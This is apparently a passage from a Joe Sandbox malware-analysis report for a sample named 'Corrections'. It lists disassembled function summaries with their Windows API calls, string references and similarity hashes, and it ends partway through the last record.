GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 009ABC96
_wcslen.LIBCMT ref: 009ABD92

Part of subcall function 00990F4E: GetStdHandle.KERNEL32(000000F6), ref: 00990F6D

_wcslen.LIBCMT ref: 009ABDAB
_wcslen.LIBCMT ref: 009ABDC6
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 009ABE16
GetLastError.KERNEL32(00000000), ref: 009ABE67
CloseHandle.KERNEL32(?), ref: 009ABE99
CloseHandle.KERNEL32(00000000), ref: 009ABEAA
CloseHandle.KERNEL32(00000000), ref: 009ABEBC
CloseHandle.KERNEL32(00000000), ref: 009ABECE
CloseHandle.KERNEL32(?), ref: 009ABF43

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 81d9dd89f8801636f607efe316cbb1c3cc6dd7c1e5306fcfd412f930880d9a86
Instruction ID: 066b255a664e5d14cfe05def0e9a8bd46d0cc837bf685550ed33af2bd741c758
Opcode Fuzzy Hash: 81d9dd89f8801636f607efe316cbb1c3cc6dd7c1e5306fcfd412f930880d9a86
Instruction Fuzzy Hash: C1F1C0716083409FC714EF24C891B6ABBE5BFC5314F18895DF8958B2A6DB31EC41CB92

Function 009A4A46 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 478libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,009BDCD0), ref: 009A4B18
GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 009A4B2A
GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,009BDCD0), ref: 009A4B4F
FreeLibrary.KERNEL32(00000000,?,009BDCD0), ref: 009A4B9B
StringFromGUID2.OLE32(?,?,00000028,?,009BDCD0), ref: 009A4C05
SysFreeString.OLEAUT32(00000009), ref: 009A4CBF
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 009A4D25
SysFreeString.OLEAUT32(?), ref: 009A4D4F

Strings

GetModuleHandleExW, xrefs: 009A4B24
kernel32.dll, xrefs: 009A4B13

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
String ID: GetModuleHandleExW$kernel32.dll
API String ID: 354098117-199464113
Opcode ID: d462c54044d029f88155bc1fb5478cdedf64ea2af9a10edc011ae40e48df52a7
Instruction ID: 9bcda9f7e2135c96bd492406afe76b56b08ac77bf50f804e9932b3035f52e56b
Opcode Fuzzy Hash: d462c54044d029f88155bc1fb5478cdedf64ea2af9a10edc011ae40e48df52a7
Instruction Fuzzy Hash: 06124D71A00115EFDB14DF94C884EAEB7B9FF86314F248098F919AB251D7B1ED46CBA0

Function 0092381F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(009F29C0), ref: 00963F72
GetMenuItemCount.USER32(009F29C0), ref: 00964022
GetCursorPos.USER32(?), ref: 00964066
SetForegroundWindow.USER32(00000000), ref: 0096406F
TrackPopupMenuEx.USER32(009F29C0,00000000,?,00000000,00000000,00000000), ref: 00964082
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0096408E

Strings

0, xrefs: 0092382D

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: 7bb8e5e96d3d4d5bb59aae3f6c1f049352695659877c1bbfb45ac77bf804e392
Instruction ID: 68dd9a389e132790573ccc81d6569a88fbce2864e03f42407ae461eeec9c48df
Opcode Fuzzy Hash: 7bb8e5e96d3d4d5bb59aae3f6c1f049352695659877c1bbfb45ac77bf804e392
Instruction Fuzzy Hash: A8713870604215BFFB219F69DC49FAABFA8FF44364F108216F6146A1E1C7B5AD10DB50

Function 009B7711 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,?), ref: 009B7823

Part of subcall function 00928577: _wcslen.LIBCMT ref: 0092858A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 009B7897
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 009B78B9
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009B78CC
DestroyWindow.USER32(?), ref: 009B78ED
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00920000,00000000), ref: 009B791C
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 009B7935
GetDesktopWindow.USER32 ref: 009B794E
GetWindowRect.USER32(00000000), ref: 009B7955
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 009B796D
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 009B7985

Part of subcall function 00922234: GetWindowLongW.USER32(?,000000EB), ref: 00922242

Strings

0, xrefs: 009B77D0
tooltips_class32, xrefs: 009B7890, 009B7915

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: 5ffbf3dc449a10565674bf64435194bc832cad0829510dfb8ebe6072c92d85e8
Instruction ID: 5fa4b6eb55099ddb4a0c6a863ddca66a6e5243eedf7fb20f5c09ec3e95f1f320
Opcode Fuzzy Hash: 5ffbf3dc449a10565674bf64435194bc832cad0829510dfb8ebe6072c92d85e8
Instruction Fuzzy Hash: CF71BA70108244AFD725CF98CD88FBABBE9FBC9320F14065DF894872A1DB70A946DB11

Function 009B9B7A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0092249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009224B0

DragQueryPoint.SHELL32(?,?), ref: 009B9BA3

Part of subcall function 009B80AE: ClientToScreen.USER32(?,?), ref: 009B80D4
Part of subcall function 009B80AE: GetWindowRect.USER32(?,?), ref: 009B814A
Part of subcall function 009B80AE: PtInRect.USER32(?,?,?), ref: 009B815A

SendMessageW.USER32(?,000000B0,?,?), ref: 009B9C0C
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 009B9C17
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 009B9C3A
SendMessageW.USER32(?,000000C2,00000001,?), ref: 009B9C81
SendMessageW.USER32(?,000000B0,?,?), ref: 009B9C9A
SendMessageW.USER32(?,000000B1,?,?), ref: 009B9CB1
SendMessageW.USER32(?,000000B1,?,?), ref: 009B9CD3
DragFinish.SHELL32(?), ref: 009B9CDA
DefDlgProcW.USER32(?,00000233,?,00000000), ref: 009B9DCD

Strings

@GUI_DRAGFILE, xrefs: 009B9D7C
@GUI_DROPID, xrefs: 009B9CFA
@GUI_DRAGID, xrefs: 009B9D45

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
API String ID: 221274066-3440237614
Opcode ID: 42fafcfe437fc3b1a84deac29bacfde299a6d39782423d9cc60484e29b8bbe80
Instruction ID: 224ade5d0d4c110ed53959e43289f7817f78e98c305e027b825f1239f186efe3
Opcode Fuzzy Hash: 42fafcfe437fc3b1a84deac29bacfde299a6d39782423d9cc60484e29b8bbe80
Instruction Fuzzy Hash: FD616A71108305AFC705EF64DD85EAFBBE8EFC8760F400A1DF695921A1DB70AA49CB52

Function 0099CEBB Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0099CEF5
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0099CF08
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0099CF1C
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0099CF35
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0099CF78
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0099CF8E
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0099CF99
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0099CFC9
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0099D021
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0099D035
InternetCloseHandle.WININET(00000000), ref: 0099D040

Strings

, xrefs: 0099CFBA

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
String ID:
API String ID: 3800310941-3916222277
Opcode ID: cd461ff285a3d0dcf35e95725d7f68549009e22f83177f4c1087514f3fbd2e44
Instruction ID: 4b82ccf75a72de15e939bee20d5b58f9184c4927d44add756d22a2ec8ebe9192
Opcode Fuzzy Hash: cd461ff285a3d0dcf35e95725d7f68549009e22f83177f4c1087514f3fbd2e44
Instruction Fuzzy Hash: C551ADB1502608BFEB219F64CD88ABB7BFCFF09394F00451AF94696210E734D945EB60

Function 009B8FCB Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,009B66D6,?,?), ref: 009B8FEE
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,009B66D6,?,?,00000000,?), ref: 009B8FFE
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,009B66D6,?,?,00000000,?), ref: 009B9009
CloseHandle.KERNEL32(00000000,?,?,?,?,009B66D6,?,?,00000000,?), ref: 009B9016
GlobalLock.KERNEL32(00000000), ref: 009B9024
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,009B66D6,?,?,00000000,?), ref: 009B9033
GlobalUnlock.KERNEL32(00000000), ref: 009B903C
CloseHandle.KERNEL32(00000000,?,?,?,?,009B66D6,?,?,00000000,?), ref: 009B9043
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,009B66D6,?,?,00000000,?), ref: 009B9054
OleLoadPicture.OLEAUT32(?,00000000,00000000,009C0C04,?), ref: 009B906D
GlobalFree.KERNEL32(00000000), ref: 009B907D
GetObjectW.GDI32(00000000,00000018,?), ref: 009B909D
CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 009B90CD
DeleteObject.GDI32(00000000), ref: 009B90F5
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 009B910B

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: f7996d95abad31c6cbb607adb219a1bb664be7567a05736e628f68fdc07b5a59
Instruction ID: 0f8ad00828188a89ce45faf83854b6d2536bcc2aa26d624b77e7ffea908e778a
Opcode Fuzzy Hash: f7996d95abad31c6cbb607adb219a1bb664be7567a05736e628f68fdc07b5a59
Instruction Fuzzy Hash: 4F416975615208FFDB109F69DE88EAA7BBCFF89724F008158F905D7260E7309901EB20

Function 009AC06E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0092B329: _wcslen.LIBCMT ref: 0092B333

Part of subcall function 009AD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,009AC10E,?,?), ref: 009AD415
Part of subcall function 009AD3F8: _wcslen.LIBCMT ref: 009AD451
Part of subcall function 009AD3F8: _wcslen.LIBCMT ref: 009AD4C8
Part of subcall function 009AD3F8: _wcslen.LIBCMT ref: 009AD4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 009AC154
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 009AC1D2
RegDeleteValueW.ADVAPI32(?,?), ref: 009AC26A
RegCloseKey.ADVAPI32(?), ref: 009AC2DE
RegCloseKey.ADVAPI32(?), ref: 009AC2FC
LoadLibraryA.KERNEL32(advapi32.dll), ref: 009AC352
GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 009AC364
RegDeleteKeyW.ADVAPI32(?,?), ref: 009AC382
FreeLibrary.KERNEL32(00000000), ref: 009AC3E3
RegCloseKey.ADVAPI32(00000000), ref: 009AC3F4

Strings

advapi32.dll, xrefs: 009AC34D
RegDeleteKeyExW, xrefs: 009AC35E

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 146587525-4033151799
Opcode ID: 89e19c33fdaa93d559b06bfd776751ba3f339b38902022421b2753948a8e4917
Instruction ID: e2e9194d90232b0b3d9d01bce801396aefffe13aaf8b30e84801c45cc85616d7
Opcode Fuzzy Hash: 89e19c33fdaa93d559b06bfd776751ba3f339b38902022421b2753948a8e4917
Instruction Fuzzy Hash: 63C17C75208201AFDB14DF54C484F6ABBE5BF85318F14899CE46A8F2A2CB75EC46CBD1

Function 009A2FB9 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 169windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 009A3035
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 009A3045
CreateCompatibleDC.GDI32(?), ref: 009A3051
SelectObject.GDI32(00000000,?), ref: 009A305E
StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 009A30CA
GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 009A3109
GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 009A312D
SelectObject.GDI32(?,?), ref: 009A3135
DeleteObject.GDI32(?), ref: 009A313E
DeleteDC.GDI32(?), ref: 009A3145
ReleaseDC.USER32(00000000,?), ref: 009A3150

Strings

(, xrefs: 009A30EA

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: dafea7c0563a08992aa83bc0e326ecf25d50e94f003e8155c3a69c72aa556b5f
Instruction ID: 34a0cb6023735e7b249a2d8104f114c636bd370ccd89251bf441a13cc8ec1b11
Opcode Fuzzy Hash: dafea7c0563a08992aa83bc0e326ecf25d50e94f003e8155c3a69c72aa556b5f
Instruction Fuzzy Hash: B8611371D14219EFCF04CFA8D984EAEBBB5FF88310F208529E555A7210E771A901DF90

Function 009BA94F Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 271windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0092249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009224B0

GetSystemMetrics.USER32(0000000F), ref: 009BA990
GetSystemMetrics.USER32(00000011), ref: 009BA9A7
GetSystemMetrics.USER32(00000004), ref: 009BA9B3
GetSystemMetrics.USER32(0000000F), ref: 009BA9C9
MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 009BAC15
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 009BAC33
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 009BAC54
ShowWindow.USER32(00000003,00000000), ref: 009BAC73
InvalidateRect.USER32(?,00000000,00000001), ref: 009BAC95
DefDlgProcW.USER32(?,00000005,?), ref: 009BACBB

Strings

@, xrefs: 009BABD0

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
String ID: @
API String ID: 3962739598-2766056989
Opcode ID: 70397bf5d4c81c4a568550b61a1a13c6959aced9dd32bd1d9d2523c8bb1f4749
Instruction ID: 7ceafcd99816f4d2422ed2101d2a63e1bf8380d90b3f2a5676f4a0e98512ece5
Opcode Fuzzy Hash: 70397bf5d4c81c4a568550b61a1a13c6959aced9dd32bd1d9d2523c8bb1f4749
Instruction Fuzzy Hash: 0FB17831600219EFDF14CF69CA847EE7BF6BF44724F188069EC849A295D770A980DB61

Function 009852AA Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 259COMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000400), ref: 009852E6
GetWindowTextW.USER32(?,?,00000400), ref: 00985328
_wcslen.LIBCMT ref: 00985339
CharUpperBuffW.USER32(?,00000000), ref: 00985345
_wcsstr.LIBVCRUNTIME ref: 0098537A
GetClassNameW.USER32(00000018,?,00000400), ref: 009853B2
GetWindowTextW.USER32(?,?,00000400), ref: 009853EB
GetClassNameW.USER32(00000018,?,00000400), ref: 00985445
GetClassNameW.USER32(?,?,00000400), ref: 00985477
GetWindowRect.USER32(?,?), ref: 009854EF

Strings

ThumbnailClass, xrefs: 009853BD, 00985450

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ClassName$Window$Text$BuffCharRectUpper_wcslen_wcsstr
String ID: ThumbnailClass
API String ID: 1311036022-1241985126
Opcode ID: 5dc9a1dc539d44c6b02c1c3c90bb75d1d7ce0e87d5459d2ca53f9a93631d7b98
Instruction ID: e2a57af8836d4d86b83250c5972ebdd14011c39b3f8ff993df3e8dd057706aab
Opcode Fuzzy Hash: 5dc9a1dc539d44c6b02c1c3c90bb75d1d7ce0e87d5459d2ca53f9a93631d7b98
Instruction Fuzzy Hash: D691E571104B06EFD708EF24D984BAAB7EDFF41344F014519FA8A82291EB31ED59CB91

Function 009B976A Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 221windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0092249F: GetWindowLongW.USER32(00000000,000000EB), ref: 009224B0

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 009B97B6
GetFocus.USER32 ref: 009B97C6
GetDlgCtrlID.USER32(00000000), ref: 009B97D1
DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 009B9879
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 009B992B
GetMenuItemCount.USER32(?), ref: 009B9948
GetMenuItemID.USER32(?,00000000), ref: 009B9958
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 009B998A
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 009B99CC
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 009B99FD

Strings

0, xrefs: 009B98FB

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow
String ID: 0
API String ID: 1026556194-4108050209
Opcode ID: 7bbb8755dd7a97a9becc495e300ffc52b9b6eb0c7fb9d35b2ced3565034b798d
Instruction ID: e74064c2c0d9ffec85f81c4694938d629da0e019b8e15efa45e9976daf6ada8c
Opcode Fuzzy Hash: 7bbb8755dd7a97a9becc495e300ffc52b9b6eb0c7fb9d35b2ced3565034b798d
Instruction Fuzzy Hash: 5D81DF715283019FD720CF24DA84AAB7BE8FF89764F100A1DFA8597291DB70D905CBA2

Function 0098C8F7 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(009F29C0,000000FF,00000000,00000030), ref: 0098C973
SetMenuItemInfoW.USER32(009F29C0,00000004,00000000,00000030), ref: 0098C9A8
Sleep.KERNEL32(000001F4), ref: 0098C9BA
GetMenuItemCount.USER32(?), ref: 0098CA00
GetMenuItemID.USER32(?,00000000), ref: 0098CA1D
GetMenuItemID.USER32(?,-00000001), ref: 0098CA49
GetMenuItemID.USER32(?,?), ref: 0098CA90
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0098CAD6
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0098CAEB
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0098CB0C

Strings

0, xrefs: 0098C904

Memory Dump Source

Source File: 0000000A.00000002.2817799310.0000000000921000.00000020.00000001.01000000.00000007.sdmp, Offset: 00920000, based on PE: true

Associated: 0000000A.00000002.2817557418.0000000000920000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009BD000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818109938.00000000009E3000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818184483.00000000009ED000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000A.00000002.2818226777.00000000009F5000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_920000_Corrections.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep
String ID: 0
API String ID: 1460738036-4108050209
Opcode ID: 01eef13bc64f0d6730e883ee7ac2bc118ebb5df1595088ae99b1f6dad785814c
Instruction ID: ee444bc433d24ec3c1313221a588dfec59c8a890343b4c996d0239dcedb5b6c8
